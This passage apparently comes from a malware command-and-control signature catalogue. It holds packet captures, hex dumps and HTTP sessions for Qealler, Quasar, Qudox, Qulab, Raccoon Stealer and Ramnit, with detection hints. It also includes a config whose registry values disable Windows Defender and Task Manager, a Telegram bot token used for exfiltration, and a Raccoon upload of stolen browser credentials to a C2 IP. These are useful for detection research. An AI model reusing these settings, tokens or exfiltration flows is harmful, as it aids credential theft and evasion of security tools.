Control"}},{"process":["Taskmgr.exe"],"code":"task-manager","reg":[{"value":"\"DisableTaskMgr\"=dword:00000002\r\n","key":"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","valuesCommand":[{"name":"DisableTaskMgr","valueCommand":"2","valueCommandType":"REG_DWORD","key":"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"}]}],"name":{"en":"Task Manager"}},{"process":["procexp.exe"],"code":"msconfig","name":{"en":"MsConfig"}},{"process":["MSASCuiL.exe","MSASCui.exe","MsMpEng.exe","MpUXSrv.exe","MpCmdRun.exe","NisSrv.exe","ConfigSecurityPolicy.exe"],"code":"windows-defender","reg":[{"value":"\"DisableAntiSpyware\"=dword:00000001\r\n","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender","valuesCommand":[{"name":"DisableAntiSpyware","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender"}]},{"value":"\"DisableBehaviorMonitoring\"=dword:00000001\r\n\"DisableOnAccessProtection\"=dword:00000001\r\n\"DisableScanOnRealtimeEnable\"=dword:00000001\r\n","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection","valuesCommand":[{"name":"DisableBehaviorMonitoring","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"},{"name":"DisableOnAccessProtection","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"},{"name":"DisableScanOnRealtimeEnable","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"}]}],"name":{"en":"Windows Defender"}}],"installDate":{"daysRunning":0,"lastModified":1586920462000},"installation":{"jarName":"vrpiI","moduleFolder":"fZrJY","moduleEntry":"LmqeMOCMZKDnCAMInhONhNssACvKupnYNmRGqciHQTmDqMeajNLIKvjeiGOkSFQDkiMQfSaBSp/atbrMtgqBWJtmbTArraiRtMHwMQqwICMrbnBkjtHHUsULWJhUZZJAlRSSnSZvWFv/hidBDxdVcfNQOjMqVwjrrjqXirgxqjnS.BlDbZGWeXeYlqIdKpxKaROeDvagYjATCOaTNXXRK","uniqueIDFile":".ntusernt.ini","delay":2,"jreFolder":"Oracle","active":true,"mainFolder":"QkpCj","moduleExtension":"Jus.txt","jarExtension":"class.txt","jarRegistry":"eHgASPs"},"localIp":"192.168.100.101"}
t..{"command":104}
t..{"command":114}
t..{"command":115}
t.N{"title":"\r\n[Administrator: Command Prompt - dump 2888]\r\n","command":115}
t.H{"time":{"hour":0,"minute":0,"second":0},"command":114,"sleeping":false}
t.A{"title":"\r\n[Administrator: Command Prompt]\r\n","command":115}
t.,{"title":"\r\n[TCPHound]\r\n","command":115}
t. {"moduleId":"008","command":108}
t.X{"title":"\r\n[MegaDumper 1.0 by CodeCracker / SnD (Not Responding)]\r\n","command":115}
t.G{"title":"\r\n[MegaDumper 1.0 by CodeCracker / SnD]\r\n","command":115}
t. {"moduleId":"008","command":108}
t.H{"time":{"hour":0,"minute":0,"second":0},"command":114,"sleeping":false}
t.,{"title":"\r\n[TCPHound]\r\n","command":115}
t.N{"title":"\r\n[Administrator: Command Prompt - dump 2888]\r\n","command":115}
t..{"command":111}
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qealler.png "Qealler")

#### Quasar RAT

Flag on the "40 00 00 00" pattern, 68 data bytes in the first packet.

~~~
00000000  40 00 00 00 3e 83 58 08 ad d1 05 8d 77 20 53 1f   @...>.X. ....w S.
00000010  dc 2e e8 99 0a f3 f1 bb 3a 8c c2 a1 9d 72 4a 69   ........ :....rJi
00000020  e6 60 97 da 1e 76 87 16 91 f2 1b c4 f4 89 f9 8a   .`...v.. ........
00000030  20 5b 19 e5 7c ae ed f1 b4 5a d2 ce 5f 86 17 20    [..|... .Z.._..
00000040  c6 b3 03 8c                                       ....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/quasar.png "Quasar")

#### Qudox

~~~
GET /gate.php?check HTTP/1.1
Host: 195.2.92.64

HTTP/1.1 200 OK
Date: Fri, 04 Sep 2020 13:08:34 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 12
Content-Type: text/html; charset=UTF-8

by+B+dC9UQ==
GET /gate.php HTTP/1.1
Host: 195.2.92.64
Content-Length: 76

TBOs3enZOi2/1kVNZdn9bAt1EnPmqL4g9GBGU95XoNzQo6hiYel7j0rkpapVu45CkORs54FJtg==
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qudox.png "Qudox")

#### Qulab Clipper

~~~
GET /bot873737212:AAFatKVhb76Tb7yoLv3dCtDO9sgKAsUV_gg/getMe HTTP/1.1
User-Agent: AutoIt
Host: api.telegram.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Fri, 01 Nov 2019 18:11:04 GMT
Content-Type: application/json
Content-Length: 124
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

{"ok":true,"result":{"id":873737212,"is_bot":true,"first_name":"MASADCLIPPERANDSTEALER","username":"aliclipperstealer_bot"}}
~~~

~~~
POST /bot873737212:AAFatKVhb76Tb7yoLv3dCtDO9sgKAsUV_gg/sendDocument HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=----WinHttpBoundaryLine_56206.90110
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,*/*;q=0.5
Accept-Charset: utf-8;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 6.1) WinHttp/1.6.4.0 (WinHTTP/5.1) like Gecko
Content-Length: 55058
Host: api.telegram.org

------WinHttpBoundaryLine_56206.90110
Content-Disposition: form-data; name="chat_id"

880414267
------WinHttpBoundaryLine_56206.90110
Content-Disposition: form-data; name="document"; filename="ENU_6887FE9730D2535E9D41.7z"
Content-Type: application/octet-stream

7z..'...E..P........$.......aO...5...]....C.k".0DL.p1SC ...UM..,.j .M.%...}...)..p.d...7.+..w..,..\....w.0z9:6....6...94..._...r..Xu.,........ .<&:e...S.4.....k._4jn. .....)+/q.*?..2 ..j..tj.Y....M.o...$1...H.....r..*%.J.A......Y..2.......0..+.......uz..../O......48.7........&.A...WT{...v.W.\.o.....cax..H.Y...A....<4<.8|........p0E....f..W.X.....Z.. ...k5..0 .1t..r.1L.p.Y,.3.....H.f......0.$....JGv...z..L'....'...&<.&m....@rS...r......u...6.#.7z...h.B..._.S.....z..F..q...].V3`w1/...._f(m...$....W<....L&Zv.a......HR.'.r...H'J(.f.......&_?..8.EL...#...j..(....._.\Vw ....d%{.$MR`e!.]..$ ...-.ct...~Za@YsbNNG...~.R......b..'..oRW3.L..N..&.Q4.
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qulab.png "Qulab")

#### RaaLoader aka Pefsire

~~~
00000000  12 10 00 00 00 00 00 00 00 00 00 00   ........ ....
00000000  00 00 00 00 06                        .....
0000000C  00 00 00 00 06                        .....
00000005  00 00 00 00 06                        .....
00000011  00 00 00 00 06                        .....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raaloader.png "RaaLoader")

#### Raccoon Stealer

~~~
POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 35.189.105.242

params=Ym90X2lkPTkwMDU5QzM3LTEzMjAtNDFBNC1CNThELTJCNzVBOTg1MEQyRl9hZG1pbiZjb25maWdfaWQ9NGVkZTQxZmUwZWE5NjMwMzRhM2Q2NWYwZGQ0NDJkZTQ2NzFjMjE0ZiZkYXRhPW51bGw=

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 30 Sep 2019 19:36:57 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

{"url":"http://35.189.105.242/file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate","attachment_url":"http://35.189.105.242/gate/sqlite3.dll","libraries":"http://35.189.105.242/gate/libs.zip","ip":"89.187.165.57","config":{"masks":null,"loader_urls":["https://mygift.space/download/beam.exe"]},"is_screen_enabled":0,"is_history_enabled":0}

POST /file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 2152
Host: 35.189.105.242

._=
--Jfbvjwj3489078yuyetu
content-disposition: form-data; name="file"; filename="data.zip"
Content-Type: application/octet-stream

PK..........>O..5kf....... ...passwords.txtUT ..`Y.]ZY.]ZY.]..w..Rp..O.IUp.(..M...... f....[.....%&.&..g.%....r........R+. .K@..\....P....bcS3^.^.`..n.E.n..0.I2..PK..........>O"..:............browsers/firefox_cookie.txtUT ..`Y.]`Y.]`Y.]..KK.@...S.O.8..+.. .+..kJ6a..!. mb...T.qQ...... .@...:.,m..y.... a...RK. .......]w.\.U.k...L<..........s.m...|..9=.].l..0...7W...zY..mi....e...........di"..|M.t2...T..E...6.RI...dB.-s..c<.c.......;.r..E....tr.[.. ......g@..X....^.Dl.`W.?.YQ.o...F...$\..K..v..+..." 0.|.PK..........>O................browsers/firefox_urls.txtUT ..`Y.]`Y.]`Y.]..K..0...= w....>hI....4..(h.lI[.zz....v7.........s.......}.MS...@kd_.n........Vw.e. ........H1%.@.8._..A.+\.U._.O.....,C1..q..tj.......'......`..c_.+.Z.N...(2,....|.. 8.vd.f.p.1.,y..PK..........>O.JJ.:...Z.......browsers/chrome_autofill.txtUT ..ZY.]ZY.]ZY.]s./.U.K.M.Rp.,*...2y..@.e.9.@a.......^..0D.O"6.A.)E.... ..PK..........>O..GMN...|.......mails/outlook.txtUT ..eY.]eY.]eY.].. P.N-*K-.2.4.34..3.3.. ..0.*.....c....Z.P._.....U.Z.T.M" ...<.(."Y......r..PK..........>O..DH....o.......System Info.txtUT ..eY.]eY.]eY.]mR]k.0.}^ ..>&.6.l..`0'Y..f.$...(.....d$;k..'ws)ez.:..su?~.D][k.....~A.W.3...F....Qx..d.+-...Vi..bn...?.K....V...;...K ^..x..P.1-....8.G..2...pE..<........Y.........?..".~.5....c.F|........0..u8;....h..2.. X....g..a"..|.>T;.IV$.[.,[...{...c.. . ...f.e.y...%k.[-.@.U..C7?.yX.a.p..o*.8.6..PI.v..7.......Tm.y..?PK............>O..5kf....... . ....... .......passwords.txtUT...`Y.]PK............>O"..:.......... ....... .......browsers/firefox_cookie.txtUT...`Y.]PK............>O.............. ....... .......browsers/firefox_urls.txtUT...`Y.]PK............>O.JJ.:...Z..... ....... .......browsers/chrome_autofill.txtUT...ZY.]PK............>O..GMN...|..... ....... ...~...mails/outlook.txtUT...eY.]PK............>O..DH....o..... ....... .......System Info.txtUT...eY.]PK....................
--Jfbvjwj3489078yuyetu--

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 30 Sep 2019 19:37:10 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

true"success"
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raccoon-1.png "Predator")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raccoon-2.png "Predator")

#### Ramnit

~~~
GET / HTTP/1.1
Host: www.yx-lj.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

HTTP/1.1 200 OK
Content-Length: 114482
Content-Type: text/html
Content-Location: http://www.yx-lj.com/index.htm
Last-Modified: Tue, 21 May 2019 01:43:35 GMT
Accept-Ranges: bytes
ETag: "47c7bf9a76fd51:ac9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 17 Oct 2019 18:56:31 GMT

.......... ..........